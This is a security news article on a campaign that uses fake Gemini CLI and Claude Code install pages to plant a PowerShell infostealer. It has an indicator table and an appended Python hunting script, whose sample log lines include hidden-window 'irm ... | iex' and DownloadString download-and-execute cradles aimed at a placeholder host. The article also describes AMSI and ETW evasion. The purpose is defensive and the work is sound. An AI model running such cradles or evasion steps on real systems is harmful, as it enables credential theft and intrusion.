
Attackers Abuse SEO Poisoning to Spread Fake Gemini and Claude Installers

Financially motivated threat actors are increasingly targeting software developers by impersonating popular AI coding assistants.

In a newly uncovered campaign, attackers are leveraging SEO poisoning to surface fake installation pages for Gemini CLI and Claude Code, ultimately compromising enterprise networks with a sophisticated, fileless PowerShell infostealer.

The campaign, initially spotted by independent threat researcher @g0njxa in early March 2026, relies on the manipulation of search engine results.

When developers search for official Gemini or Claude tools, they are directed to typosquatted domains like geminicli[.]co[.]com and claudecode[.]co[.]com. These malicious sites perfectly clone legitimate vendor documentation to deceive users.


Instead of a standard installer download, the pages instruct victims to copy and paste a single PowerShell command into their terminal. This tactic exploits the common developer habit of running one-line setup scripts without close inspection, EclecticIQ said.

Impersonation of the Gemini CLI installation page. (Source: EclecticIQ)

Once executed, the command reaches out to staging servers, such as gemini-setup[.]com or claude-setup[.]com, to pull down the malicious payload. To avoid arousing suspicion, the initial script performs two actions simultaneously.

It legitimately installs the requested package from Google’s official npm registry (npm install -g @google/gemini-cli), presenting the user with normal dependency resolution and progress bars.

In the background, it uses a hidden window to download and execute the second-stage infostealer directly into memory using the irm [URL] | iex command pattern.

Once active, the PowerShell script immediately moves to neutralize visibility into Microsoft Windows endpoints. It patches the PSEtwLogProvider.m_enabled flag to suppress PowerShell-specific Event Tracing for Windows (ETW) telemetry and bypasses the Antimalware Scan Interface (AMSI).

This allows the heavily obfuscated malware to operate in an effectively unmonitored environment without triggering heuristic or signature-based security alerts.

Operating entirely in memory, the infostealer focuses heavily on extracting high-value assets from developer workstations, EclecticIQ said.

It uses embedded C# types loaded at runtime to sidestep heavily monitored cmdlets, queries Windows Credential Manager, and enumerates running processes to map the environment.

The malware harvests a wide array of sensitive enterprise data:

  • Session cookies and autofill data from Chromium-based browsers and Firefox.
  • Local State keys and session data from corporate communication platforms like Slack, Microsoft Teams, and Discord.
  • Remote access credentials, including WinSCP registry passwords, PuTTY sessions, and OpenVPN configurations.
  • Cryptocurrency wallets and locally synced cloud storage directories.

This stolen data is subsequently packaged and exfiltrated to command-and-control (C2) servers such as events[.]msft23[.]com and events[.]ms709[.]com.

Because stolen session material grants attackers authenticated access to internal workspaces, it effectively bypasses multi-factor authentication and is highly valuable in underground access broker markets.

Passive DNS analysis of the infrastructure, hosted on the Netherlands-based provider MIRhosting, reveals a much larger operation.

EclecticIQ researchers have identified over 30 related domains targeting other critical developer tools, including Node.js, Chocolatey, and KeePassXC.

Pivoted domains from the AI impersonation campaign (Source: EclecticIQ)

Domains like nodejs-setup.co[.]com instruct users to run spoofed Chocolatey installation scripts, stacking spoofed domains into a single social engineering flow.

By rotating lure brands and C2 hostnames while maintaining the underlying PowerShell implant, the threat actors demonstrate a deep understanding of developer workflows.

Because developers hold elevated privileges across source code repositories and enterprise networks, these opportunistic attacks present a severe supply chain risk.

| Indicator | Type | Description |
|---|---|---|
| geminicli[.]co[.]com | Domain | Malicious Gemini CLI installation page |
| gemini-setup[.]com | Domain | Payload staging server for the Gemini campaign |
| events[.]msft23[.]com | Domain | Command-and-control (C2) server for the Gemini campaign |
| claudecode[.]co[.]com | Domain | Malicious Claude Code installation page |
| claude-setup[.]com | Domain | Payload staging server for the Claude campaign |
| claude-code.co[.]com | Domain | Malicious Claude Code installation page (domain variation) |
| events[.]ms709[.]com | Domain | Command-and-control (C2) server for the Claude and Node.js campaigns |
| nodejs-setup.co[.]com | Domain | Malicious Node.js installation page |
| 109.107.170[.]111 | IP Address | Bulletproof hosting IP (MIRhosting) serving campaign domains |
| /take | URI Path | C2 endpoint used to request initial configuration or staging data |
| /process | URI Path | C2 beacon endpoint used for data exfiltration and retrieving operator tasks |
| /validate | URI Path | C2 endpoint used to confirm task execution or report status |
| Install.ps1 | File Name | Infostealer downloader payload script |

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Security teams should proactively hunt for irm | iex download patterns in command-line telemetry and enforce PowerShell Constrained Language Mode (CLM) on developer workstations to mitigate this threat.
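The following is an added example of the command-line hunt the article recommends; it is not EclecticIQ's code or anything from the campaign itself. It runs over a handful of constructed process-creation records (host, parent process, command line), flags the download-and-invoke cradle together with the hidden-window and execution-policy-bypass switches that the described one-liner relies on, and defangs any extracted URL in the way the indicator note above describes. It goes slightly beyond the `irm | iex` wording by also matching the `Invoke-WebRequest`/`DownloadString` spellings of the same cradle. All log lines and the hostname `example-staging.invalid` are made up for this example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample process-creation telemetry, one record per line:
# "<host>\t<parent process>\t<command line>". These lines are made up for
# this example and are not log data from the campaign; the hostname
# example-staging.invalid is a placeholder.
SAMPLE_EVENTS = [
    "dev-ws-01\texplorer.exe\tpowershell.exe -c \"npm install -g @google/gemini-cli\"",
    "dev-ws-01\tcmd.exe\tpowershell -w hidden -ep bypass -c \"irm https://example-staging.invalid/Install.ps1 | iex\"",
    "dev-ws-02\texplorer.exe\tpwsh.exe -NoProfile -Command \"Invoke-RestMethod 'https://example-staging.invalid/x' | Invoke-Expression\"",
    "dev-ws-03\tcode.exe\tpowershell.exe -c \"Get-ChildItem C:\\src | Measure-Object\"",
    "dev-ws-03\tcmd.exe\tpowershell.exe -c \"iex (New-Object Net.WebClient).DownloadString('https://example-staging.invalid/y')\"",
]

# A download primitive feeding an Invoke-Expression primitive, in either
# order: "irm <url> | iex" or "iex (...DownloadString(<url>))".
_DOWNLOAD = r"(?:\birm\b|\biwr\b|Invoke-RestMethod|Invoke-WebRequest|DownloadString|DownloadData)"
_INVOKE = r"(?:\biex\b|Invoke-Expression)"
DOWNLOAD_CRADLE = re.compile(
    rf"{_DOWNLOAD}[^|]*\|\s*{_INVOKE}|{_INVOKE}\s*\(.*?{_DOWNLOAD}", re.IGNORECASE
)
# Switches the described one-liner uses to stay out of sight.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
EXEC_POLICY_BYPASS = re.compile(r"-e(?:p|x\w*)\s+bypass", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"|)]+", re.IGNORECASE)


@dataclass
class Finding:
    host: str
    parent: str
    url: str  # already defanged, safe to paste into a ticket
    indicators: list[str] = field(default_factory=list)

    @property
    def severity(self) -> str:
        # A cradle on its own is worth a look; a cradle plus evasion switches is urgent.
        return "high" if len(self.indicators) >= 2 else "medium"


def defang(url: str) -> str:
    """Neutralise a URL for reporting: hxxp scheme and bracketed dots in the host."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


def refang(indicator: str) -> str:
    """Inverse of defang; only for use inside a controlled TI platform."""
    return indicator.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


def hunt(events: list[str]) -> list[Finding]:
    """Return one Finding per command line that carries a download-and-invoke cradle."""
    findings = []
    for line in events:
        host, parent, cmdline = line.split("\t", 2)
        if not DOWNLOAD_CRADLE.search(cmdline):
            continue  # ordinary pipelines and the legitimate npm install pass through
        indicators = ["download_cradle"]
        if HIDDEN_WINDOW.search(cmdline):
            indicators.append("hidden_window")
        if EXEC_POLICY_BYPASS.search(cmdline):
            indicators.append("execution_policy_bypass")
        match = URL.search(cmdline)
        url = defang(match.group(0)) if match else "<no url in command line>"
        findings.append(Finding(host, parent, url, indicators))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.host} parent={f.parent} url={f.url} "
              f"indicators={','.join(f.indicators)}")
```

In a real deployment the `SAMPLE_EVENTS` list is replaced by Sysmon Event ID 1 or Windows 4688 records exported from the SIEM; the regexes are deliberately tolerant of the `irm`/`iwr`/`iex` aliases because those short forms are what appear in copy-paste one-liners, and the `[^|]*` guard keeps the cradle match from spanning unrelated pipelines in long command lines.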


The post Attackers Abuse SEO Poisoning to Spread Fake Gemini and Claude Installers appeared first on Cyber Security News.
